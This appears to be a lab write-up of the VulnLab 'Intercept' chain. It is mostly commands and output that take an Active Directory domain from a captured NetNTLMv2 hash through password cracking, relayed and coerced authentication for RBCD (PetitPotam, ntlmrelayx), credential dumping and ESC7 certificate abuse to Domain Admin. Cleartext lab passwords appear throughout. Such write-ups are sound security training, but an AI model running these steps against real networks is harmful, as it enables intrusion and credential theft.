vulnlab intercept
Intercept is a hard rated chain which contains two machines WS01 and DC01. The chain starts with forced authentication using a file upload to grab a users hash. Using this user we performed the Resourced Based Contrained Delegation (RBCD) WebClient attack to escalate privileges. Finally using ESC7 we elevate privileges to Domain Admin.
.
$ smbclient -L \\\\ws01.intercept.vl Password for [WORKGROUP\puck]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share dev Disk shared developer workspace IPC$ IPC Remote IPC Users Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to ws01.intercept.vl failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
.
upload files to smb share and capture hashes with smbserver.py/responder
$ impacket-smbserver share share -smb2support Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.250.118,63690) [*] AUTHENTICATE_MESSAGE (INTERCEPT\Kathryn.Spencer,WS01) [*] User WS01\Kathryn.Spencer authenticated successfully [*] Kathryn.Spencer::INTERCEPT:aaaaaaaaaaaaaaaa:3737678866bc6c44728f496ace58b114:01010000000000008055d8e29dfeda01350bcbc48ec2e8230000000001001000520058006b004200550077007300630003001000520058006b0042005500770073006300020010006b00410053007600490063004d006e00040010006b00410053007600490063004d006e00070008008055d8e29dfeda0106000400020000000800300030000000000000000000000000200000e7ded09557c36a93b2b02ef519d8e02660849fc8954d8c72827bfb1b0d13774a0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000 [*] Connecting Share(1:IPC$) [-] SMB2_TREE_CONNECT not found x
.
$ smbclient \\\\ws01.intercept.vl\\dev
next we crack the hash
The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked
try spraying the password on other domain users
ldapsearch -x -LLL -H ldap://dc01.intercept.vl -D 'kathryn.spencer@intercept.vl' -b 'DC=intercept,DC=vl' -w 'Chocolate1' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt
netexec smb ws01.intercept.vl -u allusers.txt -p Chocolate1 --continue-on-success
But no result,
I also use ldapdomaindump to get some domain info in HTML format
python -m ldapdomaindump -u 'intercept.vl\Kathryn.Spencer' -p 'Chocolate1' -o ldap/ 10.10.145.245
next we do some bloodhound analysis
$ bloodhound-python -c all --disable-pooling -w 1 -u kathryn.spencer -p 'Chocolate1' -d intercept.vl -dc dc01.intercept.vl -ns 10.10.145.245 --dns-tcp --zip --dns-timeout 120
.
Check LDAP signing [ not enforced = default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M ldap-checker SMB 10.10.250.117 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False) LDAP 10.10.250.117 389 DC01 [+] intercept.vl\kathryn.spencer:Chocolate1 LDAP-CHE... 10.10.250.117 389 DC01 LDAP Signing NOT Enforced! LDAP-CHE... 10.10.250.117 389 DC01 LDAPS Channel Binding is set to "NEVER"
Check Machine Quota [ 10 = default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M maq SMB 10.10.250.117 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False) LDAP 10.10.250.117 389 DC01 [+] intercept.vl\kathryn.spencer:Chocolate1 MAQ 10.10.250.117 389 DC01 [*] Getting the MachineAccountQuota MAQ 10.10.250.117 389 DC01 MachineAccountQuota: 10
Check WebDAV service is also enabled [ enabled = not default]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M webdav
.
RBCD WebClient Attack
Now that we know that the WebDAV service is active on WS01, LDAP Signing is disabled on the DC, and we can add machine accounts to the domain, we can abuse these conditions in combination with coerced authentication to escalate privileges. However, when relaying our coercion and add RBCD permissions to WS01 the authenticated connection has to originate from a trusted intranet zone. Luckily for us by default the “Authenticated Users” group can create child objects on the ADIDNS zone.
Preparing
$ python3 -m venv venv $ source venv/bin/activate $ pip install ldap3 dnspython $ pip install ldapdomaindump $ git clone https://github.com/CoreSecurity/impacket.git $ cd impacket $ python setup.py install ┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept/impacket] └─$ ntlmrelayx.py -t ldaps://10.10.250.117 --delegate-access -smb2support └─$ deactivate
.
$ git clone https://github.com/dirkjanm/krbrelayx.git
.
here it goes
Set your local dns server to the dc ip in /etc/resolv.conf before running
┌──(puck㉿kali)-[~/vulnlab/intercept] └─$ cat /etc/resolv.conf # Generated by NetworkManager search home nameserver 10.10.177.37
.
Add new dns entry that points to our attacker machine
$ python3 ./krbrelayx/dnstool.py -u 'INTERCEPT.vl\Kathryn.Spencer' dc01.intercept.vl --tcp -p Chocolate1 -a add -t A -r kali.intercept.vl -d 10.8.2.138 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully
.
Verify if A-record is created on our attacker machine
$ nslookup kali.intercept.vl 10.10.177.37 Server: 10.10.177.37 Address: 10.10.177.37#53 Name: kali.intercept.vl Address: 10.8.2.138
Add a new machine account
.
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept] └─$ impacket-addcomputer -computer-name 'WS02$' -computer-pass 'Start123!' -dc-host dc01.intercept.vl -domain-netbios intercept 'INTERCEPT/Kathryn.Spencer:Chocolate1' Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Successfully added machine account WS02$ with password Start123!.
.
Listener for relaying auth to LDAP on the DC in order to configure RBCD on WS01$ (it's allowed to write it's own attribute)
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept] └─$ sudo impacket-ntlmrelayx -smb2support -t ldaps://dc01.intercept.vl --http-port 8080 --delegate-access --escalate-user WS02\$ --no-dump --no-acl --no-da [sudo] password for puck: Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Protocol Client DCSYNC loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server on port 8080 [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections [*] HTTPD(8080): Connection from 10.10.177.38 controlled, attacking target ldaps://dc01.intercept.vl [*] HTTPD(8080): Authenticating against ldaps://dc01.intercept.vl as INTERCEPT/WS01$ SUCCEED [*] Enumerating relayed user's privileges. This may take a while on large domains [*] HTTPD(8080): Connection from 10.10.177.38 controlled, but there are no more targets left! [*] Delegation rights modified succesfully! [*] WS02$ can now impersonate users on WS01$ via S4U2Proxy
.Coerce Authentication from the workstation WS01$ using a non-default port so it's a WebDAV authentication
┌──(puck㉿kali)-[~/vulnlab/intercept] └─$ python3 ./krbrelayx/PetitPotam.py -d intercept.vl -u 'Kathryn.Spencer' -p 'Chocolate1' kali@8080/a ws01.intercept.vl PoC to elicit machine account authentication via some MS-EFSRPC functions by topotam (@topotam77) Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN Trying pipe lsarpc [-] Connecting to ncacn_np:ws01.intercept.vl[\PIPE\lsarpc] [+] Connected! [+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e [+] Successfully bound! [-] Sending EfsRpcOpenFileRaw! [-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED! [+] OK! Using unpatched function! [-] Sending EfsRpcEncryptFileSrv! [+] Got expected ERROR_BAD_NETPATH exception!! [+] Attack worked!
.Impersonate Administrator on WS01 by using our RBCD privileges
┌──(puck㉿kali)-[~/vulnlab/intercept] └─$ impacket-getST -spn cifs/ws01.intercept.vl intercept.vl/WS02\$ -impersonate administrator Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password:Start123! [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache
.
$ export KRB5CCNAME=administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache
.
$ impacket-secretsdump -k -no-pass ws01.intercept.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:83<redacted>82::: ..snip.. [*] _SC_HelpdeskService Simon.Bowen@intercept.vl:b0OI_fHO859+Aw [*] Cleaning up... [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry
What a ride
next
Using certipy
to enumerate ADCS, we can see that one of the groups that has the ManageCA
permission is the ca-managers
group, which simon.bowen
has GenericAll
permissions over
$ certipy-ad find -username 'Simon.Bowen' -password 'b0OI_fHO859+Aw' -vulnerable -dc-ip 10.10.145.245 -stdout Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Trying to get CA configuration for 'intercept-DC01-CA' via CSRA [*] Got CA configuration for 'intercept-DC01-CA' [*] Enumeration output: Certificate Authorities 0 CA Name : intercept-DC01-CA DNS Name : DC01.intercept.vl Certificate Subject : CN=intercept-DC01-CA, DC=intercept, DC=vl Certificate Serial Number : 4CEE597D2BE3DC9E4F5CDA8401EA6373 Certificate Validity Start : 2023-06-27 13:24:59+00:00 Certificate Validity End : 2124-09-05 07:48:03+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : INTERCEPT.VL\Administrators Access Rights Enroll : INTERCEPT.VL\Authenticated Users ManageCa : INTERCEPT.VL\ca-managers INTERCEPT.VL\Domain Admins INTERCEPT.VL\Enterprise Admins INTERCEPT.VL\Administrators ManageCertificates : INTERCEPT.VL\Domain Admins INTERCEPT.VL\Enterprise Admins INTERCEPT.VL\Administrators [!] Vulnerabilities ESC7 : 'INTERCEPT.VL\\ca-managers' has dangerous permissions Certificate Templates : [!] Could not find any certificate templates
.
Since simon.bowen
is apart of a group that has control of the ca-managers
group, he can write himself into the group
net rpc group addmem "ca-managers" "Simon.Bowen" -U "intercept.vl"/"Simon.Bowen"%"<simon's password :)>" -S <dc01 IP>
.
ESC 7 Exploitation
Now we have a user that has ManageCA
permission on the CA, we can successfully abuse ESC 7
Add the user as an officer
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -add-officer simon.bowen Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'
Enable the SubCA template – This certificate is configured by default to allow for authentication, therefore we should enable it to be used
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -enable-template SubCA Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'
Now request a certificate with the userPrincipalName (uPN) of the Administrator
- This request will get automatically denied, however, since Simon is an officer we can manually issue a certificate
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -template SubCA -upn 'Administrator@intercept.vl' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate. [*] Request ID is 6 Would you like to save the private key? (y/N) y [*] Saved private key to 6.key [-] Failed to request certificate
Issue the request
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -issue-request 6 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Successfully issued certificate
Get the certificate
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -retrieve 6 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Rerieving certificate with ID 6 [*] Successfully retrieved certificate [*] Got certificate with UPN 'Administrator@intercept.vl' [*] Certificate has no object SID [*] Loaded private key from '6.key' [*] Saved certificate and private key to 'administrator.pfx'
Authenticate with the PFX to the DC
$ certipy-ad auth -pfx administrator.pfx -domain intercept.vl -username administrator -dc-ip '10.10.145.245' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@intercept.vl [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad<redacted>1f
check
$ netexec smb dc01.intercept.vl -u Administrator -H ad<redacted>1f
.
$ evil-winrm -i 10.10.145.245 -u Administrator -H 'ad<redacted>1f'
This was super fun.
Resources